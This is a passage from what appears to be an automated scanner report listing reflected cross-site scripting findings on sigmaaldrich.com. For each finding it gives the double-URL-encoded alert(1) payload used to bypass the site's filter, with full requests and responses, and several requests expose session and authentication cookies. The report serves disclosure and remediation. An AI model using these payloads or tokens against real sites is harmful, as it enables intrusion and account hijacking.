       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js3b4c1";alert(1)//06cb2ec88d6/scriptaculous.js","E404") ;
   </script>
...[SNIP]...

1.526. http://www.sigmaaldrich.com/js/scriptaculous.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/scriptaculous.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 218e0%2522%253balert%25281%2529%252f%252f35faeed5d7f was submitted in the REST URL parameter 2. This input was echoed as 218e0";alert(1)//35faeed5d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/scriptaculous.js218e0%2522%253balert%25281%2529%252f%252f35faeed5d7f HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=04338111-ad87-2147-873c-a88bfc3baea9;Path=/
Content-Length: 28923


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/scriptaculous.js218e0";alert(1)//35faeed5d7f","E404") ;
   </script>
...[SNIP]...

1.527. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/sigma_functions.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5ee%2522%253balert%25281%2529%252f%252f0adfcf5682a was submitted in the REST URL parameter 1. This input was echoed as bf5ee";alert(1)//0adfcf5682a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsbf5ee%2522%253balert%25281%2529%252f%252f0adfcf5682a/sigma_functions.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=f3d2e628-efc0-904f-8f33-0341edad2066;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsbf5ee";alert(1)//0adfcf5682a/sigma_functions.js","E404") ;
   </script>
...[SNIP]...

1.528. http://www.sigmaaldrich.com/js/sigma_functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/sigma_functions.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3553%2522%253balert%25281%2529%252f%252f5a779589bc9 was submitted in the REST URL parameter 2. This input was echoed as f3553";alert(1)//5a779589bc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/sigma_functions.jsf3553%2522%253balert%25281%2529%252f%252f5a779589bc9 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=ffe307b3-a081-1149-89f6-52c75f3fac9a;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/sigma_functions.jsf3553";alert(1)//5a779589bc9","E404") ;
   </script>
...[SNIP]...

1.529. http://www.sigmaaldrich.com/life-science.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95089%2522%253balert%25281%2529%252f%252fbe619902a5f was submitted in the REST URL parameter 1. This input was echoed as 95089";alert(1)//be619902a5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /95089%2522%253balert%25281%2529%252f%252fbe619902a5f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:23 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/95089";alert(1)//be619902a5f","E404") ;
   </script>
...[SNIP]...

1.530. http://www.sigmaaldrich.com/life-science/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1cea%2522%253balert%25281%2529%252f%252fc66df451b20 was submitted in the REST URL parameter 1. This input was echoed as f1cea";alert(1)//c66df451b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencef1cea%2522%253balert%25281%2529%252f%252fc66df451b20/ HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencef1cea";alert(1)//c66df451b20/","E404") ;
   </script>
...[SNIP]...

1.531. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-biology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bef61%2522%253balert%25281%2529%252f%252f4ca28d46b6d was submitted in the REST URL parameter 1. This input was echoed as bef61";alert(1)//4ca28d46b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencebef61%2522%253balert%25281%2529%252f%252f4ca28d46b6d/cell-biology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28934
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencebef61";alert(1)//4ca28d46b6d/cell-biology.html","E404") ;
   </script>
...[SNIP]...

1.532. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-biology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de631%2522%253balert%25281%2529%252f%252f6a1d1e6ced9 was submitted in the REST URL parameter 2. This input was echoed as de631";alert(1)//6a1d1e6ced9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/de631%2522%253balert%25281%2529%252f%252f6a1d1e6ced9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
